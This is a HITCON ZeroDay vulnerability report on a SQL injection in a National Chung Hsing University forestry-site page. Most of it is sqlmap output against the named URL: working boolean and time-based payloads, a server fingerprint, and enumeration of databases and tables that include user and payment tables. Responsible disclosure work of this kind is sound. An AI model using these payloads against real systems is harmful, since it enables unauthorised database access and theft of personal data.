国立中兴大学某站SQL - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2018-00335
  •  發信 Vendor: 國立中興大學
  • Title: 国立中兴大学某站SQL
  • Introduction: 国立中兴大学惠荪林场SQL

處理狀態

目前狀態

公開
Last Update : 2018/11/24
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 未複測
  • 公開

處理歷程

  • 2018/04/01 00:47:11 : 新提交 (由 Cra5h 更新此狀態)
  • 2018/04/01 15:39:52 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/04/02 11:57:00 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/04/02 11:57:01 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/04/02 11:57:01 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/06/01 03:00:07 : 公開 (由 HITCON ZeroDay 平台自動更新)
  • 2018/11/16 18:09:47 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/11/24 03:00:21 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2018-00335
  • 通報者:cra5h (Cra5h)
  • 風險:高
  • 類型:資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。

漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

http://huisun.nchu.edu.tw/news/index.php?mode=data&id=326

敘述

国立中兴大学惠荪林场SQL
SQL位置:
http://huisun.nchu.edu.tw/news/index.php?mode=data&id=326
id参数过滤不严导致SQL注入
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 201 HTTP(s) requests:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mode=data&id=326 AND 8869=8869

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: mode=data&id=326 AND SLEEP(5)

[22:34:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12
[22:34:19] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\huisun.nchu.edu.tw'

确认了影响的库:(6个)
[22:34:39] [INFO] fetching database names
[22:34:39] [INFO] fetching number of databases
[22:34:39] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[22:34:39] [INFO] retrieved: 6
[22:34:43] [INFO] retrieved: information_schema
[22:36:06] [INFO] retrieved: forest
[22:36:35] [INFO] retrieved: mysql
[22:36:50] [INFO] retrieved: nchu_db
[22:37:16] [INFO] retrieved: performance_schema
[22:38:14] [INFO] retrieved: volunteer_db
available databases [6]:
[] forest
[] information_schema
[] mysql
[] nchu_db
[] performance_schema
[] volunteer_db

[22:39:05] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\huisun.nchu.edu.tw'

数据量较大,交互速度较慢,所以只跑了一半
sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mode=data&id=326 AND 8869=8869

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: mode=data&id=326 AND SLEEP(5)

[22:40:30] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12
[22:40:30] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[22:40:30] [INFO] fetching database names
[22:40:30] [INFO] fetching number of databases
[22:40:30] [INFO] resumed: 6
[22:40:30] [INFO] resumed: information_schema
[22:40:30] [INFO] resumed: forest
[22:40:30] [INFO] resumed: mysql
[22:40:30] [INFO] resumed: nchu_db
[22:40:30] [INFO] resumed: performance_schema
[22:40:30] [INFO] resumed: volunteer_db
[22:40:30] [INFO] fetching tables for databases: 'forest, information_schema, mysql, nchu_db, performance_schema, volunteer_db'
[22:40:30] [INFO] fetching number of tables for database 'performance_schema'
[22:40:30] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[22:40:30] [INFO] retrieved: 17
[22:40:35] [INFO] retrieved: cond_instances
[22:41:20] [INFO] retrieved: events_waits_current
[22:42:26] [INFO] retrieved: events_waits_history
[22:42:53] [INFO] retrieved: events_waits_history_long
[22:43:18] [INFO] retrieved: events_waits_summary_by_instance
[22:44:27] [INFO] retrieved: events_waits_summary_by_thread_by_event_name
[22:45:42] [INFO] retrieved: events_waits_summary_global_by_event_name
[22:46:58] [INFO] retrieved: file_instances
[22:47:40] [INFO] retrieved: file_summary_by_event_name
[22:49:03] [INFO] retrieved: file_summary_by_instance
[22:49:35] [INFO] retrieved: mutex_instances
[22:50:20] [INFO] retrieved: performance_timers
[22:51:19] [INFO] retrieved: rwlock_instances
[22:52:06] [INFO] retrieved: setup_consumers
[22:52:53] [INFO] retrieved: setup_instruments
[22:53:28] [INFO] retrieved: setup_timers
[22:53:49] [INFO] retrieved: threads
[22:54:08] [INFO] fetching number of tables for database 'mysql'
[22:54:08] [INFO] retrieved: 24
[22:54:12] [INFO] retrieved: columns_priv
[22:54:49] [INFO] retrieved: db
[22:55:07] [INFO] retrieved: event
[22:55:23] [INFO] retrieved: func
[22:55:38] [INFO] retrieved: general_log
[22:56:14] [INFO] retrieved: help_category
[22:56:52] [INFO] retrieved: help_keyword
[22:57:15] [INFO] retrieved: help_relation
[22:57:42] [INFO] retrieved: help_topic
[22:57:59] [INFO] retrieved: host
[22:58:09] [INFO] retrieved: ndb_binlog_index
[22:58:55] [INFO] retrieved: plugin
[22:59:17] [INFO] retrieved: proc
[22:59:28] [INFO] retrieved: procs_priv
[22:59:47] [INFO] retrieved: proxies_priv
[23:00:20] [INFO] retrieved: servers
[23:00:40] [INFO] retrieved: slow_log
[23:01:02] [INFO] retrieved: tables_priv
[23:01:38] [INFO] retrieved: time_zone
[23:02:09] [INFO] retrieved: time_zone_leap_second
[23:02:52] [INFO] retrieved: time_zone_name
[23:03:08] [INFO] retrieved: time_zone_transition
[23:03:41] [INFO] retrieved: time_zone_transition_type
[23:04:05] [INFO] retrieved: user
[23:04:18] [INFO] fetching number of tables for database 'forest'
[23:04:18] [INFO] retrieved: 45
[23:04:23] [INFO] retrieved: clock_daily
[23:04:59] [INFO] retrieved: configs
[23:05:22] [INFO] retrieved: configs_en
[23:05:37] [INFO] retrieved: counter_seq
[23:06:06] [INFO] retrieved: department
[23:06:35] [INFO] retrieved: diseas
[23:06:50] [INFO] retrieved: document
[23:07:11] [INFO] retrieved: download
[23:07:29] [INFO] retrieved: employee_news
[23:08:06] [INFO] retrieved: enactment
[23:08:29] [INFO] retrieved: enactment2
[23:08:38] [INFO] retrieved: event
[23:08:55] [INFO] retrieved: event_batch
[23:09:16] [INFO] retrieved: event_seq
[23:09:29] [INFO] retrieved: for_class
[23:10:01] [INFO] retrieved: group_seq
[23:10:38] [INFO] retrieved: job_title
[23:11:21] [INFO] retrieved: leave_type
[23:11:55] [INFO] retrieved: leaves
[23:12:02] [INFO] retrieved: links
[23:12:18] [INFO] retrieved: linksen
[23:12:27] [INFO] retrieved: meeting
[23:12:56] [INFO] retrieved: news
[23:13:10] [INFO] retrieved: news_category
[23:13:43] [INFO] retrieved: order_tb
[23:14:09] [INFO] retrieved: order_tb_seq
[23:14:26] [INFO] retrieved: payment
[23:14:46] [INFO] retrieved: payment_seq
[23:15:02] [INFO] retrieved: publish
[23:15:21] [INFO] retrieved: publish2
[23:15:31] [INFO] retrieved: publish2_menu
[23:15:51] [INFO] retrieved: publish3
[23:15:59] [INFO] retrieved: publish_art
[23:16:16] [INFO] retrieved: publish_art_en
[23:16:38] [INFO] retrieved: publish_book
[23:16:55] [INFO] retrieved: publish_book_en
[23:17:11] [INFO] retrieved: publish_menu
[23:17:28] [INFO] retrieved: publish_vol
[23:17:42] [INFO] retrieved: publish_vol_en
[23:17:59] [INFO] retrieved: signup
[23:18:21] [INFO] retrieved: signup_col
[23:18:43] [INFO] retrieved: signup_col_option
[23:19:09] [INFO] retrieved: users
[23:19:24] [INFO] retrieved: v_leaves
[23:19:49] [INFO] retrieved: v_signup
[23:20:09] [INFO] fetching number of tables for database 'volunteer_db'
[23:20:09] [INFO] retrieved: 10
[23:20:14] [INFO] retrieved: banner
[23:20:38] [INFO] retrieved: download_files
[23:21:20] [INFO] retrieved: limit_date
[23:21:48] [INFO] retrieved: orders
[23:22:06] [INFO] retrieved: place
[23:22:26] [INFO] retrieved: user
[23:22:41] [INFO] retrieved: userlevelpermissions
[23:23:43] [INFO] retrieved: userlevels
[23:23:51] [INFO] retrieved: volunteer
[23:24:19] [INFO] retrieved: year_orders
[23:24:58] [INFO] fetching number of tables for database 'nchu_db'
[23:24:58] [INFO] retrieved: 163
[23:25:09] [INFO] retrieved: b2c_about_us
[23:25:46] [INFO] retrieved: b2c_ad
[23:25:53] [INFO] retrieved: b2c_all_epaper
[23:26:26] [INFO] retrieved: b2c_categories
[23:27:16] [INFO] retrieved: b2c_contact_info
[23:27:55] [INFO] retrieved: b2c_contact_us
[23:28:08] [INFO] retrieved: b2c_contact_us_mail
[23:28:37] [INFO] retrieved: b2c_country_actuarial
[23:29:22] [INFO] retrieved: b2c_data_caption
[23:30:03] [INFO] retrieved: b2c_epaper
[23:30:23] [INFO] retrieved: b2c_epaper_log
[23:30:42] [INFO] retrieved: b2c_faq
[23:30:55] [INFO] retrieved: b2c_faq_cate
[23:31:14] [INFO] retrieved: b2c_footer_info
[23:31:55] [INFO] retrieved: b2c_forum
[23:32:09] [INFO] retrieved: b2c_forum_cate
[23:32:28] [INFO] retrieved: b2c_forum_reply
[23:32:56] [INFO] retrieved: b2c_gallery
[23:33:23] [INFO] retrieved: b2c_gallery_cate
[23:33:52] [INFO] retrieved: b2c_gallery_pic
[23:34:22] [INFO] retrieved: b2c_header_info
[23:35:06] [INFO] retrieved: b2c_homepage_actuarial
[23:36:11] [INFO] retrieved: b2c_inquiry_mail
[23:36:51] [INFO] retrieved: b2c_login_log
[23:37:19] [INFO] retrieved: b2c_managers
[23:37:45] [INFO] retrieved: b2c_members_clausal
[23:38:37] [INFO] retrieved: b2c_news
[23:38:51] [INFO] retrieved: b2c_order_info
[23:39:23] [INFO] retrieved: b2c_order_items
[23:39:45] [INFO] retrieved: b2c_orders
[23:39:53] [INFO] retrieved: b2c_page_counter
[23:40:35] [INFO] retrieved: b2c_paytype_info
[23:41:14] [INFO] retrieved: b2c_pro_order
[23:41:43] [INFO] retrieved: b2c_pro_views
[23:42:05] [INFO] retrieved: b2c_products
[23:42:24] [INFO] retrieved: b2c_products_categories
[23:43:05] [INFO] retrieved: b2c_referer
[23:43:32] [INFO] retrieved: b2c_service_info
[23:44:13] [INFO] retrieved: b2c_system_info
[23:44:54] [INFO] retrieved: b2c_transport
[23:45:33] [INFO] retrieved: b2c_users
[23:46:00] [INFO] retrieved: b2c_users_grade
[23:46:36] [INFO] retrieved: class_clerk
[23:47:12] [INFO] retrieved: class_course
[23:47:44] [INFO] retrieved: class_download
[23:48:27] [INFO] retrieved: class_faq
[23:48:38] [INFO] retrieved: class_forum
[23:48:59] [INFO] retrieved: class_hchcc_site
[23:49:34] [INFO] retrieved: class_hchcc_site_apply
[23:50:04] [INFO] retrieved: class_infor
[23:50:27] [INFO] retrieved: class_managers
[23:50:53] [INFO] retrieved: class_member
[23:51:10] [INFO] retrieved: class_news
[23:51:28] [INFO] retrieved: class_property
[23:52:04] [INFO] retrieved: class_receipt
[23:52:30] [INFO] retrieved: class_signup_info
[23:53:04] [INFO] retrieved: class_signup_info_20100101
[23:53:43] [INFO] retrieved: class_signup_info_tmp0606
[23:54:14] [INFO] retrieved: class_site
[23:54:24] [INFO] retrieved: class_systemset
[23:54:48] [INFO] retrieved: class_take_money_record
[23:55:49] [INFO] retrieved: class_take_money_record_test
[23:56:16] [INFO] retrieved: class_take_money_record_tmp0606
[23:57:05] [INFO] retrieved: class_take_money_record_tmp0612
[23:57:31] [INFO] retrieved: class_take_money_record_tmp0623
[23:57:51] [INFO] retrieved: class_take_money_record_tmp0726
[23:58:17] [INFO] retrieved: class_teacher
[23:58:42] [INFO] retrieved: class_term
[23:58:57] [INFO] retrieved: class_ticket
[23:59:22] [INFO] retrieved: class_trans_info
[23:59:50] [INFO] retrieved: class_type
[00:00:02] [INFO] retrieved: class_works
[00:00:31] [INFO] retrieved: class_works_cat
[00:01:11] [INFO] retrieved: imw_about_us
[00:02:17] [INFO] retrieved: imw_ad
[00:02:24] [INFO] retrieved: imw_ad_link
[00:02:41] [INFO] retrieved: imw_ad_type
[00:02:56] [INFO] retrieved: imw_blog
[00:03:10] [INFO] retrieved: imw_blog_type
[00:03:28] [INFO] retrieved: imw_booking
[00:03:47] [INFO] retrieved: imw_booking_cart
[00:04:11] [INFO] retrieved: imw_booking_charts
[00:04:33] [INFO] retrieved: imw_booking_holiday
[00:05:01] [INFO] retrieved: imw_booking_link
[00:05:25] [INFO] retrieved: imw_booking_link_booking
[00:05:59] [INFO] retrieved: imw_booking_sche
[00:06:18] [INFO] retrieved: imw_booking_spec
[00:06:33] [INFO] retrieved: imw_booking_trade
[00:06:55] [INFO] retrieved: imw_booking_trade_detail
[00:07:25] [INFO] retrieved: imw_booking_type
[00:07:41] [INFO] retrieved: imw_cart
[00:07:56] [INFO] retrieved: imw_contact_us
[00:08:32] [INFO] retrieved: imw_content
[00:08:50] [INFO] retrieved: imw_download
[00:09:16] [INFO] retrieved: imw_download_type
[00:09:42] [INFO] retrieved: imw_epapers
[00:10:13] [INFO] retrieved: imw_epapers_log
[00:10:33] [INFO] retrieved: imw_epapers_queue
[00:10:55] [INFO] retrieved: imw_epapers_subscriber
[00:11:28] [INFO] retrieved: imw_epapers_subscriber_type
[00:12:02] [INFO] retrieved: imw_epapers_type
[00:12:34] [INFO] retrieved: imw_files
[00:13:02] [INFO] retrieved: imw_files_l
[00:13:39] [CRITICAL] unable to connect to the target URL (''). sqlmap is going to retry the request(s)
ink
[00:13:47] [INFO] retrieved: imw_film
[00:13:53] [INFO] retrieved: imw_film_type
[00:14:19] [INFO] retrieved: imw_food
[00:14:46] [INFO] retrieved: imw_food_charts
[00:15:21] [INFO] retrieved: imw_food_link
[00:15:37] [INFO] retrieved: imw_food_link_food
[00:16:06] [INFO] retrieved: imw_food_spec
[00:16:27] [INFO] retrieved: imw_food_type
[00:16:44] [INFO] retrieved: imw_forum
[00:16:55] [INFO] retrieved: imw_forum_type
[00:17:13] [INFO] retrieved: imw_gallery_albu

[00:17:46] [ERROR] user aborted

修補建議

过滤,参数化

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;